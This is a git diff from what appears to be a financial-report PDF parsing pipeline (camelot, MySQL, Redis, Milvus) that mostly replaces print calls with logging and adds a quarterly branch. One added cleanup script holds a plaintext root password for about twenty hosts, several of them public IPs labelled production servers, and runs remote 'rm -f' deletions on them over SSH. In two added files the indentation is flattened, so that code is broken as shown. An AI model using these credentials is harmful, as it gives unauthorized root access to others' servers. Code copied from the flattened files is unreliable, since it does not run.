@@ -574,8 +613,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         cursor.execute(select_query_half_year)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"vector config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the half-year branch')
+        logger.info(f"vector config query took {(end_time - start_time):.2f}s")
+        logger.info(f'insert_table_measure_from_vector_async_process took the half-year branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []
@@ -583,13 +622,27 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
             p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name))
             processes.append(p)
             p.start()
+    elif report_type == 2:
+        start_time = time.time()
+        cursor.execute(select_query_first_quarter)
+        records = cursor.fetchall()
+        end_time = time.time()
+        logger.info(f"vector config query took {(end_time - start_time):.2f}s")
+        logger.info(f'insert_table_measure_from_vector_async_process took the first-quarter branch')
+        start_time = time.time()
+        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
+        processes = []
+        for record_range in records_range_parts:
+            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name))
+            processes.append(p)
+            p.start()
     elif report_type == 3:
         start_time = time.time()
         cursor.execute(select_query_thrid)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"vector config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the third-quarter branch')
+        logger.info(f"vector config query took {(end_time - start_time):.2f}s")
+        logger.info(f'insert_table_measure_from_vector_async_process took the third-quarter branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []
@@ -603,8 +656,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         cursor.execute(select_query)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"vector config query took {(end_time - start_time):.2f}s")
-        print('insert_table_measure_from_vector_async_process took the annual-report branch')
+        logger.info(f"vector config query took {(end_time - start_time):.2f}s")
+        logger.info(f'insert_table_measure_from_vector_async_process took the annual-report branch')
         start_time = time.time()
         records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
         processes = []
@@ -613,13 +666,13 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
             processes.append(p)
             p.start()
-    print('waiting for all subtasks, file ID:', file_id)
+    logger.info(f'waiting for all subtasks, file ID: {file_id}')
     for p in processes:
         p.join()
-    print('all subtasks finished, file ID:', file_id)
-    print('starting measure normalization, file ID:', file_id)
+    logger.info(f'all subtasks finished, file ID: {file_id}')
+    logger.info(f'starting measure normalization, file ID: {file_id}')
     end_time = time.time()
-    print(f"vector update took {(end_time - start_time):.2f}s")
+    logger.info(f"vector update took {(end_time - start_time):.2f}s")
 def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name):
     create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
@@ -646,7 +699,7 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
     cursor.execute(select_query)
     records = cursor.fetchall()
     end_time = time.time()
-    print(f"vector config query took {(end_time - start_time):.2f}s")
+    logger.info(f"vector config query took {(end_time - start_time):.2f}s")
     start_time = time.time()
@@ -708,9 +761,9 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
                 cursor.execute(insert_query, data_to_insert)
                 conn.commit()
     except Exception as e:
-        print(e)
+        logger.info(e)
     end_time = time.time()
-    print(f"vector update took {(end_time - start_time):.2f}s")
+    logger.info(f"vector update took {(end_time - start_time):.2f}s")
     start_time = time.time()
@@ -720,6 +773,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
         (file_id, page_num, content)
         VALUES (%s, %s, %s)
     '''
     for table in table_info:
         try:
             data=[]
@@ -730,6 +784,12 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
             measure_list = table['measure_list']
             for measure in measure_list:
                 measure_name = measure['measure_name']
+                # measures to skip
+                black_list = ["营业总成本"]
+                if any(black in measure_name for black in black_list):
+                    continue
                 measure_value = measure['measure_value'].replace("(", "").replace(")", "")
                 measure_name = utils.get_clean_text(measure_name)
                 measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')  # maddening: these stray characters refuse to be removed
@@ -745,7 +805,9 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                 measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
                 measure_unit = measure['measure_unit']
                 if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
                     vector_obj = utils.embed_with_str(measure_name_1)
                     vector = vector_obj.output["embeddings"][0]["embedding"]
                     measure_data = {}
                     measure_data['vector'] = vector
@@ -800,18 +862,18 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
                     data=data,
                     partition_name=partition_name
                 )
+            logger.info(f"vector insert finished")
         except Exception as e:
-            print(e)
+            logger.info(e)
 def runing_job():
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )
     # create a cursor to execute SQL statements
     cursor = conn.cursor(buffered=True)
     select_query = '''
@@ -856,7 +918,8 @@ def delete_database(conn,cursor,file_id):
             cursor.execute(truncate,(file_id,))
         conn.commit()
     except Exception as e:
-        print(f'delete failed: {e}')
+        logger.info(f'delete failed: {e}')
 def delete_to_run(conn,cursor,file_id):
     try:
         truncate_query = [
@@ -875,23 +938,23 @@ def delete_to_run(conn,cursor,file_id):
             cursor.execute(truncate,(file_id,))
         conn.commit()
     except Exception as e:
-        print(f'delete failed: {e}')
+        logger.info(f'delete failed: {e}')
 def insert_pdf_text_info(table_info,conn,cursor):
-    # run the SQL insert
     insert_query = '''
        INSERT INTO pdf_text_info
        (file_id, page_num, text)
        VALUES (%s, %s, %s)
     '''
     file_id = table_info['file_id']
-    page_num = int(table_info['page_num'])
+    page_num = table_info['page_num']
     text = table_info['text']
     data_to_insert = (file_id, page_num, text)
     cursor.execute(insert_query, data_to_insert)
     conn.commit()
 def process_time(file_id,type,time,start_time,end_time):
     conn = mysql.connector.connect(
         host= MYSQL_HOST,
@@ -911,6 +974,7 @@ def process_time(file_id,type,time,start_time,end_time):
     data_insert = (file_id,type,time,start_time,end_time)
     cursor.execute(insert_query,data_insert)
     conn.commit()
 def batch_insert_page_text_nocheck(table_info, conn, cursor):
     file_id = table_info['file_id']
     page_num = int(table_info['page_num'])
@@ -923,6 +987,7 @@ def batch_insert_page_text_nocheck(table_info, conn, cursor):
     data_to_insert = [(file_id, page_num, text) for text in text_lines]
     cursor.executemany(insert_query, data_to_insert)
     conn.commit()
 def batch_insert_page_text(table_info, conn, cursor):
     file_id = table_info['file_id']
     page_num = int(table_info['page_num'])
@@ -945,6 +1010,7 @@ def batch_insert_page_text(table_info, conn, cursor):
     else:
         pass
     conn.commit()
 def file_type_check(file_id):
     conn = mysql.connector.connect(
         host= MYSQL_HOST,
@@ -965,6 +1031,7 @@ def file_type_check(file_id):
     finally:
         cursor.close()
         conn.close()
 def file_type_check_v2(file_id):
     conn = mysql.connector.connect(
         host= MYSQL_HOST,
@@ -989,10 +1056,10 @@ def file_type_check_v2(file_id):
 def pdf_title_insert_mysql(file_id,title_array):
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )
     cursor = conn.cursor(buffered=True)
     for item in title_array:
@@ -1003,13 +1070,12 @@ def pdf_title_insert_mysql(file_id,title_array):
     cursor.close()
     conn.close()
 def get_file_info_from_mysql(file_id):
     conn = mysql.connector.connect(
-        host= MYSQL_HOST,
-        user= MYSQL_USER,
-        password= MYSQL_PASSWORD,
-        database= MYSQL_DB
+        host = MYSQL_HOST,
+        user = MYSQL_USER,
+        password = MYSQL_PASSWORD,
+        database = MYSQL_DB
     )
     #cursor = conn.cursor(buffered=True)
     cursor = conn.cursor(dictionary=True)
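For reference, a sketch of the MilvusClient search pattern this module relies on (vector size, metric, and fields follow the commented example earlier in this diff; note that pymilvus search takes partition_names, where the insert calls above use partition_name):

from pymilvus import MilvusClient

client = MilvusClient(uri="http://127.0.0.1:19530")
res = client.search(
    collection_name="pdf_measure_v4",
    data=[[0.0] * 1536],                 # one query vector
    limit=3,
    search_params={"metric_type": "COSINE", "params": {}},
    output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
    filter='file_id == "2122"',
    partition_names=["partition_00"],
)
for hit in res[0]:
    print(hit["distance"], hit["entity"]["measure_name"])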

View File

@@ -0,0 +1,84 @@
# error notice / cleanup helper
import paramiko
import time
import threading

# run the cleanup commands on one server
def execute_commands_on_server(hostname, username, password, host):
    try:
        # connect to the server
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=hostname, username=username, password=password)
        # run the commands in an interactive shell
        shell = client.invoke_shell()
        # remove the downloaded PDFs
        shell.send("cd /root/pdf_parser/pdf\n")
        time.sleep(1)
        shell.send("rm -f *.pdf\n")
        time.sleep(10)
        shell.send("rm -f *.PDF\n")
        time.sleep(10)
        # read the output
        output = shell.recv(2048).decode()
        print(f"Output from {hostname}:\n{output}")
    except paramiko.SSHException as e:
        print(f"SSH connection error with {hostname}: {e}")
    finally:
        client.close()

# thread entry point
def thread_function(server):
    execute_commands_on_server(server['hostname'], server['username'], server['password'], server['host'])
# server list
# servers = [
#     {'hostname': 'server1.example.com', 'username': 'user1', 'password': 'pass1', 'host': 'host1'},
#     {'hostname': 'server2.example.com', 'username': 'user2', 'password': 'pass2', 'host': 'host2'},
#     # add more servers here
# ]
servers = [
    #{'hostname': '124.70.129.232', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'test server'},
    # {'hostname': '1.94.179.121', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server'},  # retired
    # the old 10 machines
    {'hostname': '113.44.72.157', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 1'},
    {'hostname': '1.94.101.237', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 2'},
    {'hostname': '123.60.16.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 3'},
    {'hostname': '124.71.157.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 4'},
    {'hostname': '1.94.60.103', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 5'},
    {'hostname': '1.94.143.23', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 6'},  # everything gets stored here
    {'hostname': '124.71.149.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 7'},
    {'hostname': '113.44.52.221', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 8'},
    {'hostname': '121.37.137.13', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 9'},
    {'hostname': '123.60.28.83', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'production server 10'},
    # the new 10 machines
    {'hostname': '192.168.0.19', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 1'},
    {'hostname': '192.168.0.53', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 2'},
    {'hostname': '192.168.0.150', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 3'},
    {'hostname': '192.168.0.210', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 4'},
    {'hostname': '192.168.0.129', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 5'},
    {'hostname': '192.168.0.24', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 6'},
    {'hostname': '192.168.0.250', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 7'},
    {'hostname': '192.168.0.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 8'},
    {'hostname': '192.168.0.86', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 9'},
    {'hostname': '192.168.0.88', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'new production server 10'},
]
# create and start the threads
threads = []
for server in servers:
thread = threading.Thread(target=thread_function, args=(server,))
threads.append(thread)
thread.start()
# wait for all threads to finish
for thread in threads:
thread.join()
print("All commands executed.")

View File

@@ -0,0 +1,246 @@
import pandas as pd
import mysql.connector
import utils
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
import re
import redis
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
# read the first Excel workbook
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)  # the "ttt" sheet
# convert the DataFrame to a list of dicts
data_list = df.to_dict(orient='records')
# connect to the MySQL database
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
# insert the rows into the measure_create_config table
insert_query = '''
INSERT INTO measure_create_config
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
VALUES (%s, %s, %s, %s, %s, %s)
'''
for data in data_list:
show_measure = str(data['指标'])
same_mean_measure = str(data['同义表述'])
period_measure = str(data['周期'])
change_measure = str(data['变动'])
black_list = str(data['黑名单词'])
config_id = utils.get_md5(show_measure)
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
cursor.execute(insert_query, insert_query_data)
conn.commit()
# read the second Excel workbook
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)  # the period sheet
# convert the DataFrame to a list of dicts
period_list = df_period.to_dict(orient='records')
# insert the rows into the measure_create_period table
period_insert_query = '''
INSERT INTO measure_create_period
(period_name, same_mean_period)
VALUES (%s, %s)
'''
for data in period_list:
period_name = str(data['标准表述'])
same_mean_period = str(data['同义表述'])
insert_query_data = (period_name, same_mean_period)
cursor.execute(period_insert_query, insert_query_data)
conn.commit()
# query the database
data_query = '''
SELECT * FROM measure_create_config WHERE delete_status = 0
'''
period_query = '''
SELECT * FROM measure_create_period
'''
cursor.execute(data_query)
data_list = cursor.fetchall()
cursor.execute(period_query)
period_list = cursor.fetchall()
# write the results to a file
with open(output_file_path, 'w', encoding='utf-8') as file:
for data in data_list:
config_id = data[0]
show_measure = data[1]
same_mean_measure = data[2]
period_measure = data[3]
change_measure = data[4]
same_mean_measure_arr = []
period_measure_arr = []
change_measure_arr = []
if same_mean_measure != 'nan':
same_mean_measure_arr = same_mean_measure.split(',')
same_mean_measure_arr.append(show_measure)
if period_measure != 'nan':
period_measure_arr = period_measure.split(',')
if change_measure != 'nan':
change_measure_arr = change_measure.split(',')
for c in change_measure_arr:
period_measure_arr.append(c)
for x in period_measure_arr:
if x in change_measure_arr:
show_name = show_measure + x
else:
show_name = x + show_measure
for y in same_mean_measure_arr:
if x in change_measure:
parser_name = y + x
else:
parser_name = x + y
file.write(f'{show_name},{parser_name}\n')
for p in period_list:
period_exra_name = p[0]
period_exra_value = p[1]
if period_exra_name in x:
for v in period_exra_value.split(','):
if x in change_measure:
parser_name = y + x.replace(period_exra_name, v)
else:
parser_name = x.replace(period_exra_name, v) + y
file.write(f'{show_name},{parser_name}\n')
cursor.close()
conn.close()
# generate a new measure config table from the old one
def create_new_config(conn, cursor, table_name,old_year,new_year):
select_query = f'''
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
FROM {table_name}
WHERE year = '{old_year}'
'''
cursor.execute(select_query)
data_list = cursor.fetchall()
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
'''
for data in data_list:
ori_measure_name = data[3]
if re.match(r'^\d{4}',ori_measure_name):
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
year += 1
ori_measure_name = str(year) + ori_measure_name[4:]
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
cursor.execute(insert_query, insert_data)
conn.commit()
def measure_config_to_db(conn, cursor, table_name):
year_list = ["2021","2022","2023","2024","2025"]
for year in year_list:
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
VALUES (%s, %s, %s, %s,%s,%s,%s)
'''
check_query = f'''
SELECT ori_measure_id FROM {table_name}
WHERE year = '{year}'
'''
# newly added measures
lines = [
f"当期营业收入,{year}年第一季度营业收入",
f"当期归母净利润,{year}年第一季度归母净利润",
f"当期扣非净利润,{year}年第一季度扣非净利润",
f"当期经营活动现金流净额,{year}年第一季度经营活动现金流净额",
f"当期筹资活动现金流净额,{year}年第一季度筹资活动现金流净额",
f"当期投资活动现金流净额,{year}年第一季度投资活动现金流净额",
f"当期非经常性损益,{year}年第一季度非经常性损益",
f"当期基本每股收益,{year}年第一季度基本每股收益",
f"当期稀释每股收益,{year}年第一季度稀释每股收益",
f"当期加权平均净资产收益率,{year}年第一季度加权平均净资产收益率",
f"当期扣非加权平均净资产收益率,{year}年第一季度扣非加权平均净资产收益率",
f"当期营业成本 ,{year}年第一季度营业成本",
f"当期销售费用,{year}年第一季度销售费用",
f"当期管理费用,{year}年第一季度管理费用",
f"当期财务费用,{year}年第一季度财务费用",
f"当期研发费用,{year}年第一季度研发费用"]
# process each line
for line in lines:
config_list = line.strip().split(',')
measure = config_list[0]
ori_measure = config_list[1]
ori_measure_id = utils.get_md5(ori_measure)
# 判断数据库中是否有数据
cursor.execute(check_query)
check_records = cursor.fetchall()
if any(record[0] == ori_measure_id for record in check_records):
continue
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
cursor.execute(insert_query, data_to_insert)
conn.commit()
def insert_measure_vector(conn, cursor, table_name):
    from config import REDIS_HOST, REDIS_PASSWORD, REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)  # 192.168.0.172 #测试123.60.153.169
    # 执行SQL语句更新数据
    select_query = f'''
        SELECT ori_measure_id, ori_measure_name FROM {table_name}
    '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    print(f"总计{len(records)}条数据")
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标', record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
            redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()
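The vectors are cached in the Redis hash measure_config as stringified Python lists, so consumers parse them back with ast.literal_eval before handing them to Milvus. A minimal read-back sketch (the id value is a hypothetical placeholder):

import ast
import redis
from config import REDIS_HOST, REDIS_PORT, REDIS_PASSWORD

redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
raw = redis_client.hget('measure_config', 'e0a0f6...')  # bytes, e.g. b'[0.12, -0.03, ...]'
if raw is not None:
    vector = ast.literal_eval(raw.decode('utf-8'))      # back to list[float] for Milvus search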
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
if __name__ == "__main__":
    # 需要先清空本地数据库的 measure_create_config 和 measure_create_period 表
    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',  # ttt文件
    #     'F:\\11_pdf\\period_1.xlsx',  # period文件
    #     'F:\\11_pdf\\out_2022_new_year.txt'  # 输出文件
    # )
    from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
    conn = mysql.connector.connect(
        host=MYSQL_HOST_APP,
        user=MYSQL_USER_APP,
        password=MYSQL_PASSWORD_APP,
        database=MYSQL_DB_APP
    )
    cursor = conn.cursor()
    #file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
    # 更新第一季度的measure_vector
    table_name = 'measure_config'
    # 写入mysql
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name, '2023', '2024')
    # 插入redis
    insert_measure_vector(conn, cursor, table_name)

View File

@ -0,0 +1,51 @@
import logging
import os
from logging.handlers import RotatingFileHandler

def setup_logging():
    # 创建logs目录(如果不存在)
    log_dir = 'logs'
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    # 配置根日志记录器
    root_logger = logging.getLogger()
    # 如果已经有handlers,先移除它们以防重复
    if root_logger.handlers:
        for handler in root_logger.handlers[:]:
            root_logger.removeHandler(handler)
    root_logger.setLevel(logging.INFO)
    # 创建格式化器
    formatter = logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    )
    # 创建文件处理器
    file_handler = RotatingFileHandler(
        os.path.join(log_dir, 'app.log'),
        maxBytes=10*1024*1024,  # 10MB
        backupCount=5
    )
    file_handler.setLevel(logging.INFO)
    file_handler.setFormatter(formatter)
    # 创建控制台处理器
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)
    # 添加处理器到根日志记录器
    root_logger.addHandler(file_handler)
    root_logger.addHandler(console_handler)
    # 设置propagate=False以防止日志消息向上传播
    for logger_name in logging.root.manager.loggerDict:
        logger = logging.getLogger(logger_name)
        logger.propagate = False
    return root_logger

logger = setup_logging()
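Modules pick up the configured logging simply by importing the module-level instance, as main.py does in the diff below:

from log_config import logger
logger.info('解析开始')  # goes to both logs/app.log and the console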

View File

@ -22,8 +22,7 @@ from multiprocessing import Process
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
import redis
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
+from log_config import logger
'''
已知发现问题
@ -40,7 +39,7 @@ from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Colle
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助'
-PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|美元|日元'
+PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目名称|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|(?<=\d)美元|\美元(?=\d)|日元'
MUILT_PATTERN = '调整前'
#unit_pattern = re.compile(r'单位[|:]?(百万元|千万元|亿元|万元|千元|元)')
unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')#修改单位匹配规则,不限制冒号,只限制距离
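The relaxed unit_pattern no longer requires a colon after the keyword; it only bounds how far the unit word may sit from it. A quick sanity check (illustrative snippet, not part of this commit):

import re
unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')
for text in ['单位:万元', '单位(人民币)千元', '金额单位为亿元']:
    m = unit_pattern.search(text)
    print(text, '->', m.group(2) if m else None)
# prints 万元, 千元, 亿元; the colon is no longer mandatory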
@ -81,7 +80,7 @@ def safe_process_array(func, arr):
    try:
        return func(arr)
    except Exception as e:
-        print(f"这个函数出现了报错{func.__name__}: {e}")
+        logger.info(f"这个函数出现了报错{func.__name__}: {e}")
        return arr # 返回原数组以便继续后续处理
#单独针对三季报的资产负债表识别合并问题
@ -199,7 +198,7 @@ def process_array_with_grants(arr, keywords=['本报告期', '年初至报告期
def get_table_range(file_path, file_id, pages, tables_range):
-    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
+    logger.info(f'Run task 解析表格--{pages} {os.getpid()}')
    start = time.time()
    conn = mysql.connector.connect(
@ -223,12 +222,26 @@ def get_table_range(file_path, file_id, pages, tables_range):
    try:
        tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'],shift_text = ['l'])
        for t in tables:
            top = t._bbox[3]
            buttom = t._bbox[1]
            page_num = int(t.page)
            table_index = int(t.order)
            arr = np.array(t.data)
+            if page_num != 0:
+                # 表格数据写入
+                line_texts = []
+                for lines in t.data:
+                    lines = list(set(lines))
+                    for line in lines:
+                        line_texts.append(line)
+                db_service.batch_insert_page_text_nocheck({
+                    'file_id': file_id,
+                    'page_num' : page_num,
+                    'text' : line_texts
+                },conn,cursor)
            arr = safe_process_array(process_array, arr) #部分资产负债表合并问题
            arr = safe_process_array(process_array_with_annual_comparison, arr) #复杂表格的优化"多个上年同期时处理"
            arr = safe_process_array(process_array_with_grants, arr) #三季报的非经常损益
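The new block dedupes each camelot row with list(set(lines)) before writing it to page_text. A set drops duplicates but not in a stable order; if cell order ever matters downstream, dict.fromkeys is the order-preserving alternative (illustrative snippet, not from the commit):

row = ['八、每股收益:', '八、每股收益:', '八、每股收益:', '0.0715']
print(list(set(row)))            # deduplicated, arbitrary order
print(list(dict.fromkeys(row)))  # deduplicated, original order: ['八、每股收益:', '0.0715']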
@ -421,8 +434,14 @@ def get_table_range(file_path, file_id, pages, tables_range):
                    "data" : new_data,
                    'sort_num' : page_num*1000 - top
                }},conn_app,cursor_app)
    except Exception as e:
-        print(f'camelot解析表格时出现了{e}')
+        logger.info(f'camelot解析表格时出现了{e}')
    get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app)
    cursor.close()
@ -432,7 +451,7 @@ def get_table_range(file_path, file_id, pages, tables_range):
    redis_client.close()
    end = time.time()
-    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
+    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
def text_in_table(top, tables_range, page_num):
    if tables_range.get(page_num):
@ -468,7 +487,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
    page_start = pages.split('-')[0]
    page_end = pages.split('-')[1]
-    print(f'pages的值为{pages}')
+    logger.info(f'pages的值为{pages}')
    select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
    cursor.execute(select_year_select)
    record_select = cursor.fetchall()
@ -513,8 +532,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                    line_text = re.sub(r"\s", "", line_text)
                    #提取符合要求的文本写入pdf_text_info用于文本书写错误识别
-                    if not utils.pdf_text_flag(line_text):
+                    # if not utils.pdf_text_flag(line_text):
                    line_texts.append(line_text)
                    #db_service.insert_pdf_text_info({
                    #    'file_id': file_id,
                    #    'page_num' : pagenum+1,
@ -536,7 +555,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                    if text_type in ('page_header','page_footer'):
                        break
                    if pagenum ==44:
-                        print(f'line_text在第44页的值有{line_text}')
+                        logger.info(f'line_text在第44页的值有{line_text}')
                    #这个对一整页都有用,会去掉很多正确的表
                    # 记录需要过滤掉的页码
                    if len(re.findall('母公司|现金流量表补充', line_text)) > 0 :
@ -546,10 +565,11 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                            'type': 'parent_com',
                        },conn_app,cursor_app)
                    # 保存每个表格上方小范围区域的文字,这部分内容包含了表格的标题和指标单位
                    table_info = {}
+                    if utils.check_table_title_black_list(line_text,title_list):
                        db_service.insert_measure_parser_info({
                            'file_id': file_id,
                            'content': f"{range['page_num']}_{range['table_index']}",
@ -613,6 +633,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                    table_info = {}
                    # 记录需要过滤掉的页码
                    if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
+                        logger.info(f'line_text{line_text}')
+                        logger.info(f'pagenum{pagenum}')
                        db_service.insert_measure_parser_info({
                            'file_id': file_id,
                            'content': pagenum+2,
@ -665,8 +687,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
                'text' : line_texts
            },conn,cursor)
    except Exception as e:
-        print(f'第{pagenum}页处理异常')
-        print(e)
+        logger.info(f'第{pagenum}页处理异常')
+        logger.info(e)
def get_table_unit_info(file_id,line_text,page_num,table_index):
@ -725,7 +747,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
        uri=MILVUS_CLIENT,
    )
-    print('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
+    logger.info('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
    start = time.time()
    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]
@ -739,9 +761,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                rows, cols = arr.shape
                if rows == 1 and cols == 1:
                    continue
                row_num , col_num = -1 , -1
                # 使用嵌套循环遍历数组,获取第一个数值位置
                for i in range(rows):
                    for j in range(cols):
@ -834,6 +854,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
